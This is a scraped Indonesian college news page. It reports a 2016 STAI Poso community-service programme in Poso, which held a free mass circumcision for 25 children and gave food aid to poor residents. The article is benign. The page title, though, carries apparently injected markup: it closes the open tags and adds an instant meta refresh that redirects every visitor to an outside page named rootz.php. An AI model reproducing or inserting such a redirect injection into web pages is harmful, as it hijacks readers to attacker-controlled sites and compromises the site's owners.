/xmlrpc.php" /> KKN STAI POSO TAHUN 2016 – “</html></link></script><meta http-equiv="refresh" content="0;URL=http://shohmansur.tj/rootz.php"> /wp-includes/wlwmanifest.xml" /> /favicon.ico" type="image/x-icon" />

« /2016/02/02/pemkab-poso-serahkan-bantuan-kendaraan-operasional-stai-poso/" rel="prev">Pemkab Poso Serahkan Bantuan Kendaraan Operasional STAI Poso

/2016/03/01/meningkatkan-ekonomi-desa-mahasiswa-stai-poso-tanam-hampir-500-bibit-durian-otong/" rel="next">Meningkatkan Ekonomi Desa, Mahasiswa STAI Poso Tanam hampir 500 Bibit Durian Otong »

Feb 25

Cetak ini Pos

KKN STAI POSO TAHUN 2016

25 Anak Disunat, Warga Miskin Menerima Bantuan Dari Mahasiswa KKN

SUNATANSunatan massal, kegiatan sosial dalam program Kuliah Kerja Nyata (KKN) Sekolah Tinggi Agama Islam (STAI) Poso yang diadakan pada hari Ahad (21/02) lalu berlangsung sangat meriah. Acara khitan berlangsung di halaman Masjid Muhajirin Kompleks Menui Kelurahan Lawanga Kecamatan Poso Kota Utara melalui kerjasama dengan Rumah Khitanan Poso. Acara khitanan ini dimulai sekitar pukul 08.30 WIB yang dibuka oleh Imam Masjid Muhajirin Haji Yusuf Runa yang dihadiri oleh seluruh peserta KKN angkatan IV, Tokoh Agama, Tokoh Masyarakat Kelurahan Lawanga, Dosen Supervisor dan Orang Tua Peserta. Jumlah peserta 25 orang tidak hanya berasal dari kecamatan Poso Kota Utara saja namun ada juga yang berasal dari Kecamatan Lage dan Kecamatan Poso Pesisir.

Satu-persatu peserta khitan memasuki ruangan di halaman masjid Muhajirin, tangisan anak-anak yang dikhitan mulai terdengar. Peserta khitan banyak yang menangis karena takut disunat, sebagian menangis karena mendengar teman-teman yang lain menangis. Ada juga peserta khitan yang tidak menangis sama sekali. Untuk menghibur peserta khitan, usai disunat panitia memberikan bingkisan dengan harapan dapat mengobati rasa sakit setelah dikhitan.

“Pada dasarnya acara ini bertujuan membantu para orang tua yang ingin mengkhitanankan anaknya, melalui acara khitan ini peserta khitan sama sekali tidak dipungut biaya malah mendapat bingkisan” ujar Darmansyah Koordinator Posko IV Kelurahan Lawanga.

BANTUAN KKNPada waktu dan tempat yang berbeda Posko II KKN STAI Poso Kelurahan Lawanga menyerahkan bantuan kepada warga miskin (25/02). Bantuan sembako tersebut sebagai kepedulian peserta KKN terhadap warga setempat untuk menjalin tali persaudaraan. Koordinator Desa Posko II Kelurahan Lawanga Husen Shihab mengatakan, selain bentuk kepedulian sosial terhadap warga kurang mampu, program kegiatan ini juga sebagai bentuk terima kasih kami kepada warga kelurahan Lawanga yang telah menerima keberadaan kami di kelurahan ini. “Warga disini (Kelurahan Lawanga, red) sangat welcome. Banyak membantu kami dalam menyelesaikan kegiatan yang sudah kami programkan” jelas Husen.

Sementara Ibu Sa’diyah (65) yang akrab di sapa Nene Ala ketika ditemui di sela-sela penyerahan bantuan tersebut merasa sangat bersyukur dan berterima kasih kepada mahasiswa KKN yang telah membantunya. “Saya tidak pernah menyangka jika hari ini saya mo dikasi (diberikan) bantuan. Saya hanya bisa berdoa semoga Allah membalas kebaikan mereka” harap Nene Ala.

Panitia Pelaksana yang diwakili oleh Sekretaris Panitia Yusran Matuna mengatakan bahwa kegiatan ini masuk dalam kategori program unggulan KKN. “Untuk itu kami sebagai panitia KKN sangat mengapresiasi ide dan kecerdasan teman-teman peserta KKN dalam menentukan pilihan program KKN. Selain menjadi unggulan, harapannya program ini bisa ditiru serta akan bernilai pahala disisi Allah SWT” tambah Yusran. (ryan)

Tautan permanen menuju artikel ini: "/2016/02/25/serba-serbi-kkn-stai-poso-tahun-2016/

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Anda dapat menggunakan tag dan atribut HTML berikut: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>